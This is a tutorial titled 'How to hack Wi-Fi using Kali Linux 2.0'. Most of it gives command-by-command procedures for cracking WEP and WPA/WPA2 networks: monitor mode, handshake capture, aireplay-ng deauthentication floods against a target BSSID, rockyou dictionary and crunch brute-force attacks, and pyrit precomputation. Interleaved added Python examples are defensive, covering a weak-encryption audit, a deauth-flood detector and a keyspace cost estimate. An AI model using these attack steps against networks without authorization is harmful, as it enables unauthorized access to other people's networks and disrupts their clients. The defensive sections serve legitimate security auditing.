How to hack Wi-Fi using Kali Linux 2.0

WiFi Hacking


Crack WEP-protected Wi-Fi using the terminal.


1.  Open a terminal in Kali Linux.

2.  In the terminal type: airmon-ng

           (Checks whether your wireless card is detected and working properly.)

3.  Type: airmon-ng start wlan0

           (Puts your wireless card into monitor mode; capturing the frames needed for cracking is possible only in monitor mode.)

4.  Type command: airodump-ng mon0

           (Scans for the wireless access points around you and shows details about each one.)

5.  Type command: airodump-ng -w <file name> -c <target channel no.> --bssid <BSSID of target> mon0

           (e.g. airodump-ng -w MTNL-01 -c 3 --bssid 11:22:33:44:55:66 mon0)

           (Starts capturing packets from the target for cracking the WEP key. airodump-ng appends a sequence number to the file name prefix, so the capture is written to MTNL-01-01.cap.)

6.  Type command: aireplay-ng -0 0 -a 11:22:33:44:55:66 mon0

           (If only a few packets are being captured, the above command sends deauthentication frames to the access point so that clients reconnect and generate more data packets, which makes the capture faster.)

7.  Type command: aircrack-ng MTNL-01-01.cap

           (aircrack-ng is used to recover the WEP key from the captured packets.)
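The same airodump-ng run also writes a CSV next to the .cap file, and that CSV is what a network owner should be reading. The following is an added example, not part of the original tutorial: it parses that CSV layout (a constructed sample is embedded) and lists every access point still running WEP, WPA1/TKIP or no encryption, i.e. the networks the procedure above would succeed against.

```python
import csv
import io

# Constructed sample in the layout of the CSV that "airodump-ng -w <name>" writes next to the .cap
# file (access-point section only; the station section after the blank line is ignored here).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
11:22:33:44:55:66, 2015-10-01 10:00:00, 2015-10-01 10:05:00,  3,  54, WEP , WEP, OPN, -40,  120,  5000,   0.  0.  0.  0,   7, MTNL-01,
AA:BB:CC:DD:EE:01, 2015-10-01 10:00:00, 2015-10-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -55,   80,     0,   0.  0.  0.  0,   4, MTNL,
AA:BB:CC:DD:EE:02, 2015-10-01 10:00:00, 2015-10-01 10:05:00, 11,  54, OPN , , , -70,   30,     0,   0.  0.  0.  0,   5, Guest,
AA:BB:CC:DD:EE:03, 2015-10-01 10:00:00, 2015-10-01 10:05:00,  1,  54, WPA , TKIP, PSK, -60,   50,     0,   0.  0.  0.  0,   6, Legacy,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""

# Privacy values as airodump-ng prints them, mapped to the finding a network owner should act on.
FINDINGS = {
    "WEP": "WEP: key recoverable from captured traffic, replace with WPA2/WPA3",
    "OPN": "open network: traffic is unencrypted",
    "WPA": "WPA1/TKIP: deprecated, move to WPA2-CCMP or WPA3",
}

def parse_access_points(text):
    """Return one dict per access-point row, keyed by the header names, with values stripped."""
    section = text.strip().split("\n\n", 1)[0]      # the AP section ends at the first blank line
    reader = csv.reader(io.StringIO(section))
    header = [h.strip() for h in next(reader)]
    return [{h: v.strip() for h, v in zip(header, row)} for row in reader if len(row) >= len(header)]

def audit(text):
    """List (bssid, essid, privacy, finding) for every AP whose Privacy column is a weak value."""
    findings = []
    for ap in parse_access_points(text):
        privacy = ap["Privacy"].split()[0] if ap["Privacy"] else "OPN"   # "WPA2 WPA" -> "WPA2"
        if privacy in FINDINGS:
            findings.append((ap["BSSID"], ap["ESSID"], privacy, FINDINGS[privacy]))
    return findings

if __name__ == "__main__":
    for bssid, essid, privacy, finding in audit(SAMPLE_CSV):
        print(f"{bssid}  {essid:<8} {privacy:<4} {finding}")
```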

 

Crack WEP-protected Wi-Fi using the Gerix tool.



1.  Go to Applications > BackTrack > Exploitation Tools > Wireless Exploitation Tools > WLAN Exploitation > gerix-wifi-cracker-ng.

2.  Open the Configuration tab.

3.  Select the interface from the list and click the Enable/Disable Monitor Mode button. This puts the wireless card into monitor mode.

4.  Scan networks to get a list of all available wireless networks.

5.  Select a target wireless network.

6.  Open the WEP tab.

7.  Click "Start Sniffing and Logging".

8.  Open WEP Attacks (no-client).

9.  Click the button "Start false access point Authentication on victim".

10. After enough packets have been collected (at least 10000), cancel and close the opened terminal windows.

11. Open the Cracking tab in Gerix.

12. Click the button "Aircrack-ng - Decrypt WEP password".


How to crack WPA/WPA2-protected Wi-Fi with a dictionary



1.  Open a terminal in Kali Linux.

2.  Type command: airmon-ng

           (Checks whether your wireless card is detected and working properly.)

3.  Type command: airmon-ng start wlan0

           (Puts your wireless card into monitor mode; capturing the frames needed for cracking is possible only in monitor mode.)

4.  Type command: airodump-ng mon0

           (Scans for the wireless access points around you and shows details about the available networks.)

5.  Type command: airodump-ng -w <file name> -c <target channel no.> --bssid <BSSID of target> mon0

           (e.g. airodump-ng -w MTNL -c 3 --bssid 11:22:33:44:55:66 mon0)

           (The above command is used to capture the WPA handshake. airodump-ng appends a sequence number to the file name prefix, so the capture is written to MTNL-01.cap.)

6.  Type command: sudo aireplay-ng -0 0 -a 11:22:33:44:55:66 mon0

           (Sends a deauthentication attack to the target access point; this disconnects the clients, and the handshake is captured when they reconnect.)

7.  Type command: aircrack-ng -w wordlist.lst -b 11:22:33:44:55:66 MTNL-01.cap

           [ -w = the name of the dictionary file
             -b = the MAC address (BSSID) of the access point
             MTNL-01.cap = the capture file that contains the authentication handshake ]

The above command cracks the Wi-Fi passphrase using a dictionary attack.

[Note: Default location of the wordlist in Kali Linux: /usr/share/wordlists/rockyou.txt.gz]
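The deauthentication flood in step 6 is easy to spot from the air. The following is an added example, not from the original tutorial: it parses raw 802.11 management frames and alerts when a burst of deauth/disassoc frames for one BSSID arrives within a short window. The frame-building helper and the sample capture are constructed for the demonstration; a real deployment would feed it frames read from a monitor-mode interface.

```python
import struct
from collections import defaultdict, deque

DEAUTH, DISASSOC, BEACON = 12, 10, 8        # 802.11 management-frame subtypes (frame type 0)
BROADCAST = bytes.fromhex("ffffffffffff")

def mac(text):
    return bytes.fromhex(text.replace(":", ""))

def build_mgmt_frame(subtype, dst, src, bssid, reason=None):
    """Constructed test helper: 24-byte 802.11 management header plus the 2-byte reason code body."""
    frame_control = struct.pack("<H", subtype << 4)  # protocol version 0, type 0 (management)
    body = struct.pack("<H", reason) if reason is not None else b""
    return frame_control + b"\x00\x00" + mac(dst) + mac(src) + mac(bssid) + b"\x00\x00" + body

def parse_mgmt(frame):
    """Return (subtype, dst, src, bssid, reason) for a management frame, or None for anything else."""
    if len(frame) < 24:
        return None
    frame_control = struct.unpack_from("<H", frame)[0]
    if (frame_control >> 2) & 0x3 != 0:              # type bits: 0 = management
        return None
    subtype = (frame_control >> 4) & 0xF
    reason = struct.unpack_from("<H", frame, 24)[0] if subtype in (DEAUTH, DISASSOC) and len(frame) >= 26 else None
    return subtype, frame[4:10], frame[10:16], frame[16:22], reason

def detect_deauth_flood(frames, window=1.0, threshold=10):
    """frames: (timestamp seconds, raw frame) pairs; one alert per BSSID when `threshold` deauth/disassoc
    frames fall inside `window` seconds."""
    recent, alerted, alerts = defaultdict(deque), set(), []
    for ts, raw in frames:
        parsed = parse_mgmt(raw)
        if parsed is None or parsed[0] not in (DEAUTH, DISASSOC):
            continue
        _, dst, _, bssid, reason = parsed
        times = recent[bssid]
        times.append(ts)
        while ts - times[0] > window:                 # drop frames that fell out of the sliding window
            times.popleft()
        if len(times) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({"bssid": ":".join(f"{b:02x}" for b in bssid), "count": len(times),
                           "broadcast": dst == BROADCAST, "reason": reason, "time": ts})
    return alerts

# Constructed sample: a beacon, 20 broadcast deauths in 0.4 s from the page's example BSSID, then one
# unrelated deauth from another AP that must not trigger an alert.
AP = "11:22:33:44:55:66"
SAMPLE = [(0.0, build_mgmt_frame(BEACON, "ff:ff:ff:ff:ff:ff", AP, AP))]
SAMPLE += [(0.1 + i * 0.02, build_mgmt_frame(DEAUTH, "ff:ff:ff:ff:ff:ff", AP, AP, reason=7)) for i in range(20)]
SAMPLE.append((5.0, build_mgmt_frame(DEAUTH, "aa:bb:cc:dd:ee:01", "aa:bb:cc:dd:ee:02", "aa:bb:cc:dd:ee:02", reason=3)))
```

Running `detect_deauth_flood(SAMPLE)` returns a single alert for 11:22:33:44:55:66 after the tenth frame; a handful of deauths spread over minutes, as a normal AP produces, never reaches the threshold.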

Steps to set up the dictionary


1. cp /usr/share/wordlists/rockyou.txt.gz ~/

          (copy the file to root's home directory, /root)

2. gunzip rockyou.txt.gz

          (decompress the file; this produces rockyou.txt)

3. mv rockyou.txt wordlist.lst

           (rename the file from rockyou.txt to wordlist.lst, the name used in step 7 above)


How to crack WPA/WPA2-protected Wi-Fi without a dictionary



1.  Open a terminal in Kali Linux.

2.  Type command: airmon-ng

           (Checks whether your wireless card is detected and working properly.)

3.  Type command: airmon-ng start wlan0

           (Puts your wireless card into monitor mode; capturing the frames needed for cracking is possible only in monitor mode.)

4.  Type command: airodump-ng mon0

           (Scans for the wireless access points around you and shows details about the available networks.)

5.  Type command: airodump-ng -w <file name> -c <target channel no.> --bssid <BSSID of target> mon0

           (e.g. airodump-ng -w MTNL -c 3 --bssid 11:22:33:44:55:66 mon0)

           (The above command is used to capture the WPA handshake. airodump-ng appends a sequence number to the file name prefix, so the capture is written to MTNL-01.cap.)

6.  Type command: sudo aireplay-ng -0 0 -a 11:22:33:44:55:66 mon0

           (Sends a deauthentication attack to the target access point; this disconnects the clients, and the handshake is captured when they reconnect.)

7.  Type command: crunch 8 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng -b 11:22:33:44:55:66 -w - MTNL-01.cap

           [a) crunch: crunch is used to crack Wi-Fi without a dictionary, because it generates the wordlist itself. It works like a brute-force attack: it tries every possible combination of the characters specified by the user.

            b) 8 12: the minimum password length is 8 and the maximum is 12, so the generated candidates start at 8 characters and go up to 12 characters.

            c) The character set, as specified by the user, contains all lowercase letters a-z, uppercase letters A-Z and digits 0-9.

            d) -b: specifies the target access point's MAC address (BSSID); -w - tells aircrack-ng to read the candidate passwords from standard input, i.e. from crunch.

            e) MTNL-01.cap is the handshake capture file on which the attack is performed.]


How to speed up the Wi-Fi cracking process using pyrit


In the dictionary and crunch attacks the PMK computation rate is only around 4000 per second, so cracking takes a long time; use the method below to increase the speed of the attack. It gives 60000-100000 PMKs per second, depending on the client's hardware.
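The following is an added example, not from the original tutorial, that shows what each candidate costs and why the crunch approach above is impractical while a dictionary of real passwords is the actual risk: it computes the WPA/WPA2-PSK PMK derivation that pyrit precomputes per ESSID, and the time to exhaust the crunch 8 12 keyspace at the 4000 and 100000 PMK/s rates quoted on this page. The 14 million line dictionary size used for comparison is an assumption, roughly the size of rockyou.txt.

```python
import hashlib

def wpa_pmk(passphrase, ssid, iterations=4096):
    """PMK as defined for WPA/WPA2-PSK: PBKDF2-HMAC-SHA1 of the passphrase, salted with the SSID,
    4096 rounds, 32 bytes. Every candidate from a wordlist or from crunch must go through this
    before it can be checked against the captured handshake, and the SSID salt is why pyrit's
    precomputed table (create_essid + batch) only serves one network name."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), iterations, 32)

def keyspace(charset_size, min_len, max_len):
    """Number of candidates that crunch <min> <max> <charset> emits."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))

def years_to_exhaust(candidates, pmk_per_second):
    return candidates / pmk_per_second / (365 * 24 * 3600)

def estimate(charset_size=62, min_len=8, max_len=12, rates=(4000, 100000)):
    """Exhaustion time in years for the page's crunch command at the PMK rates the page quotes."""
    n = keyspace(charset_size, min_len, max_len)
    return {rate: years_to_exhaust(n, rate) for rate in rates}

def dictionary_hours(words, pmk_per_second):
    """Wall-clock hours to run a whole wordlist of `words` entries through the PMK derivation."""
    return words / pmk_per_second / 3600

if __name__ == "__main__":
    # Standard WPA test vector: passphrase "password", SSID "IEEE".
    print(wpa_pmk("password", "IEEE").hex())
    for rate, years in estimate().items():
        print(f"crunch 8 12 (62 chars) at {rate:>6} PMK/s: {years:.3g} years to exhaust")
    # Assumption: a wordlist of about 14 million entries, roughly rockyou.txt.
    print(f"14M-word dictionary at 4000 PMK/s: {dictionary_hours(14_000_000, 4000):.1f} hours")
```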

1.  Open a terminal in Kali Linux.

2.  Type command: airmon-ng

           (Checks whether your wireless card is detected and working properly.)

3.  Type command: airmon-ng start wlan0

           (Puts your wireless card into monitor mode; capturing the frames needed for cracking is possible only in monitor mode.)

4.  Type command: airodump-ng mon0

           (Scans for the wireless access points around you and shows details about the available networks.)

5.  Type command: airodump-ng -w <file name> -c <target channel no.> --bssid <BSSID of target> mon0

           (e.g. airodump-ng -w MTNL -c 3 --bssid 11:22:33:44:55:66 mon0)

           (The above command is used to capture the WPA handshake. airodump-ng appends a sequence number to the file name prefix, so the capture is written to MTNL-01.cap.)


[Note: Default location of the wordlist in Kali Linux: /usr/share/wordlists/rockyou.txt.gz]


Steps to set up the dictionary


1. cp /usr/share/wordlists/rockyou.txt.gz ~/

          (copy the file to root's home directory, /root)

2. gunzip rockyou.txt.gz

          (decompress the file; this produces rockyou.txt)

3. mv rockyou.txt wordlist.lst

           (rename the file from rockyou.txt to wordlist.lst)


 

Download and install pyrit


1.  svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit_svn

(download the source)

2.  cd pyrit_svn/pyrit/ && ./setup.py build install

(build and install pyrit from its setup.py)

3.  cd ..

(step back to pyrit_svn)

4.  cd cpyrit_calpp

(go to the cpyrit_calpp directory)

5.  Edit the setup.py file: find VERSION = '0.4.0-dev' and change it to VERSION = '0.4.1-dev'

also
                find CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include')) and replace it with CALPP_INC_DIRS.append(os.path.join(CALPP_INC_DIR, 'include/CAL'))

After making the above changes in setup.py, save the file and run the command below.

6.  ./setup.py build install

(build and install the edited module)

7.  pyrit -e MTNL create_essid

(create the ESSID in the pyrit database)

8.  pyrit -i wordlist.lst import_passwords

(import the dictionary into the pyrit database)

9.  pyrit batch

(precompute the PMK for every imported password against the stored ESSID and keep the results in the database)

10. pyrit -r MTNL-01.cap attack_db

(run the attack on the handshake file using the precomputed database)

This process greatly speeds up the cracking and recovers the Wi-Fi key in much less time.